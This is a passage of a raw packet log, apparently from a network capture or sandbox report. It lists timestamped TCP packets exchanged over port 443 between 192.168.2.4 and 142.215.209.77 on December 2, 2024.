                                                            Dec 2, 2024 09:18:15.014214039 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.014242887 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.016834021 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.016841888 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.016900063 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.016907930 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.020226002 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.020234108 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.020386934 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.020396948 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.022974014 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.023000002 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.023030996 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.023037910 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.023063898 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.025491953 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.025547028 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.025554895 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.028913975 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.028964996 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.028973103 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.031562090 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.031620026 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.031626940 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.034919977 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.034970045 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.034976959 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.037568092 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.037620068 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.037626982 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.040240049 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.040294886 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.040303946 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.043330908 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.043387890 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.043395996 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.045978069 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.046036959 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.046045065 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.049304962 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.049357891 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.049365997 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.067146063 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.067217112 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.067224979 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.115437984 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.184784889 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.184799910 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.184827089 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.184864998 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.184916973 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.212697029 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.212707043 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.212743998 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.212774038 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.212779999 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.215413094 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.215440035 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.215471983 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.215480089 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.215502977 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.218774080 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.218837023 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.218844891 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.221410036 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.221479893 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.221487045 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.224114895 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.224175930 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.224184036 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.227474928 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.227528095 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.227535963 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.230191946 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.230248928 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.230256081 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.232803106 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.232855082 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.232862949 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.236212015 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.236270905 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.236279011 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.238965034 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.239025116 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.239032030 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.241514921 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.241575956 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.241583109 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.244611979 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.244661093 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.244668961 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.247966051 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.248018980 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.248033047 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.250721931 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.250775099 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.250787973 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.268421888 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.268475056 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.268481970 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.318566084 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.386094093 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.386107922 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.386145115 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.386171103 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.386215925 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.414031029 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.414041996 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.414129972 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.414139986 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.416662931 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.416688919 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.416727066 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.416734934 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.416753054 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.420099974 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.420165062 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.420172930 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.422857046 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.422918081 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.422925949 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.425354004 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.425501108 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.425509930 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.428769112 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.428826094 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.428833008 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.431561947 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.431638002 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.431644917 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.434854031 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.434922934 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.434930086 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.437469006 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.437521935 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.437530994 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.440222979 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.440284014 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.440290928 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.443562031 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.443631887 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.443639040 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.445837975 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.445888042 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.445894957 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.449239016 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.449290037 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.449299097 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.451980114 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.452029943 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.452038050 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.473217964 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.473282099 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.473289013 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.521713972 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.587275028 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.587291956 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.587333918 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.587376118 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.587414980 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.615468025 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.615478992 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.615535975 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.615550041 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.618186951 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.618227005 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.618370056 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.618377924 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.621607065 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.621656895 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.621670961 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.621679068 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.621700048 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.624151945 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.624212980 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.624219894 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.626807928 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.626868963 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.626877069 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.630345106 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.630399942 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.630408049 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.632864952 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.632940054 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.632946968 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.635510921 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.635579109 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.635585070 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.640464067 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.640520096 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.640525103 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.641685963 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.641740084 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.641746998 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.644325972 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.644392014 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.644397974 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.647363901 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.647433996 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.647439957 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.650769949 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.650990963 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.650998116 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.653440952 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.653506994 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.653512955 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.682565928 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.682642937 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.682648897 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.724842072 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.788907051 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.788914919 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.788957119 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.788980961 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.789037943 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.816659927 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.816667080 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.816739082 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.816757917 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.820018053 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.820050955 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.820070982 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.820080996 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.820090055 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.822750092 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.822817087 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.822824001 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.825582981 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.825637102 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.825644016 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.828736067 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.828785896 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.828793049 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.831511974 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.831556082 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.831562996 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.834820986 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.834878922 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.834886074 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.837436914 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.837496996 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.837503910 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.840178967 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.840233088 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.840240002 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.843628883 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.843683004 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.843691111 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.846255064 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.846328974 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.846333981 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.849222898 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.849276066 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.849282980 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.851952076 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.852018118 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.852025032 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.855292082 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.855344057 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.855350971 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.884232998 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.884305954 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.884311914 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.927937984 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.994895935 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.994904041 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.994923115 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.994947910 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.994987011 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.994992018 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.018686056 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.018693924 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.018737078 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.018745899 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.018769026 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.021290064 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.021297932 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.021353960 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.021363020 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.024048090 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.024056911 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.024106026 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.024113894 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.027420998 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.027458906 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.027493000 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.027502060 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.027525902 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.030194044 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.030201912 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.030267954 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.030277014 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.032831907 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.032883883 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.032890081 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.032917023 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.036130905 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.036185980 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.036192894 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.039150953 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.039210081 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.039216042 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.041430950 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.041492939 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.041498899 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.044842005 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.044903994 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.044910908 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.047558069 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.047616959 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.047624111 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.050662041 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.050721884 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.050729036 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.053231955 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.053277016 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.053283930 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.053317070 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.056585073 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.056642056 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.056648016 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.086081982 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.086134911 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.086142063 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.131069899 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.195950031 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.195957899 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.196005106 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.196012020 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.196060896 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.219836950 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.219845057 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.219903946 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.219912052 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.223186016 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.223218918 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.223243952 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.223252058 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:16.223273993 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:16.225766897 CET44349733142.215.209.77192.168.2.4
